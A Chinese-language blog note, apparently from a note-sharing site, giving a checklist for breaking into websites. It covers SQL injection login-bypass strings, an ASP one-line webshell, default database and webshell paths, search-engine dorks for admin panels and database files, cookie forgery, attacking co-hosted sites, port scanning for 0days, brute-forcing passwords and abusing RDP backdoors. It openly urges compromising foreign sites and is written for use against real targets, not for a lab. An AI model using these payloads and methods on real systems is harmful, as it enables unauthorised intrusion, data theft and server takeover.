[关闭]
@1kbfree 2018-04-12T02:03:43.000000Z 字数 2845 阅读 1399

[思路]-拿站点姿势

渗透


首先,观察指定网站。

入侵指定网站是需要条件的:

以下是入侵网站常用方法:

1.上传漏洞

如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies再用DOMAIN上传. 

2.注入漏洞

字符过滤不严造成的
一般都是出现在与数据交互的地方,比如文章处,搜索框,等(太多与数据交互的地方了)

3. 暴库:把二级目录中间的/换成%5c 

4.'or'='or'这是一个可以连接SQL的语名句(万能密码).可以直接进入后台,不过现在可以说基本上遇不到了。

类似的万能密码还有:

  1. 'or''='
  2. " or "a"="a  
  3. ') or ('a'='a  
  4. ") or ("a"="a  
  5. or 1=1-- 
  6. ' or 'a'='a

5.社会工程学。

6.写入ASP格式数据库。就是一句话木马〈%execute request("iamfree")%〉 (数据库必需得是ASP或ASA的后缀)

7.源码利用:一些网站用的都是网上下载的源码,有的站长很懒,什么也不改就直接丢服务器了

比如:默认数据库,默认后台地址,默认管理员帐号密码等,像很多开源社区源码的后台都是admin

8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL(几率很小):

  1. /Databackup/dvbbs7.MDB
  2. /bbs/Databackup/dvbbs7.MDB
  3. /bbs/Data/dvbbs7.MDB
  4. /data/dvbbs7.mdb
  5. /bbs/diy.asp
  6. /diy.asp
  7. /bbs/cmd.asp
  8. /bbs/cmd.exe
  9. /bbs/s-u.exe
  10. /bbs/servu.exe

工具:网站猎手 挖掘鸡 明小子(很老的工具)

9.查看目录法:一些网站可以断开目录,可以访问目录。

10.工具溢出

11.搜索引擎利用:

  1. inurl:flasher_list.asp 
  2. 默认数据库:database/flash.mdb 
  3. 后台/manager/
  4. 找网站的管理后台地址:
  5. site:xxxx.comintext:管理
  6. site:xxxx.comintitle:管理  〈关键字很多,自已找〉
  7. site:xxxx.cominurl:login
  8. 查找access的数据库,mssqlmysql的连接文件
  9. allinurl:bbsdata
  10. filetype:mdbinurl:database
  11. filetype:incconn
  12. inurl:datafiletype:mdb

12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

13.利用常见的漏洞:如动网BBS

可以先用:dvbbs权限提升工具,使自已成为前台管理员。
然后,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用
WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具  动网固顶贴工具

14.还有一些老漏洞。

如IIS3,4的查看源码,5的Delete CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。


如果目标网站没有漏洞,可以试着入侵同服务器上的其它网站。。。如果能够入侵同服务器上的(旁注)
其它网站,就可以获得权限,看能不能够提权拿到服务器等。
也可以直接入侵这台网站的服务器!
比如:用IP端口扫描软件,扫描一下目标服务器都开放了哪些端口,
然后利用开放的漏洞端口进行入侵。

知道端口还可以查询目标服务器有哪些漏洞,比如微软最新Oday漏洞,利用漏洞拿到服务器权限
木马入侵,让网站主机感染你的木马。主要是看目标网站服务器系统是否存在漏洞。


主站一般都很安全.一般从二级域名下手 多看看那些大站新出来的测试分站点
猜路径别忘了google 考虑看站点下的robot.txt或者robots.txt 永远别忘记社会工程学 简单的密码也会有以外收获

别忽视XSS,别忽视cookie,XSS可以偷cookie,cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙

  1. 无论什么站,无论什么语言,要渗透,第一件事就是扫目录

  2. 找上传点. 国外棒子国. 一般都存在于站点论坛. 留言版 必须注册资料后

  3. asp(aspx)+MSSQL先考虑注入 出现dbowner权限直接写shell 库分离 那后台入手 上传 或者修改配置

  4. asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;

  5. php+MYSQL一般是注入进后台上传,运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的漏洞,运气好可以直接写shell。

  6. jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。

命令很多种列几种自己常用的吧:

  1. site:xxx.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
  2. site:xxx.com inurl:login|admin|manage|manager|admin_login|login_admin|system
  3. site:xxx.com intitle:管理|后台|登陆|
  4. site:xxx.com intext:验证码

搜集一些基本信息
在地址后面逐一添加info.php phpinfo.php test.php 找到 php统计配置信息

老外~

  1. 外国很多是开源的程序,手里要有一些开源的程序,有了源码你想干什么就干什么。
  2. 平时自己收集一些外国人存放上传文件的路径,加入到扫描工具里面去,收集的漏洞路径多了,遇到网站扫描一下有很多意想不到的好事发生。
  3. 用一些扫描网站目录结构的工具了解一下网站的整体结构,然后进入寻找。
  4. 外国的一样可以旁注,旁注的垃圾站一次搞定。
  5. 3389连下,很多有“谢代健”后门,老外的习惯。呵呵。
  6. 手里几个暴力破解网站登录密码工具不可少。
  7. 日下老外站记得下下整个网站程序,研究学习。了解老外写网站的定性思维。
  8. 老外的服务器有的都是老版本的系统,用0DAY检测下,成功几率很大。

加油,渗透之路很漫长,坚强且需要勿忘初心。

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注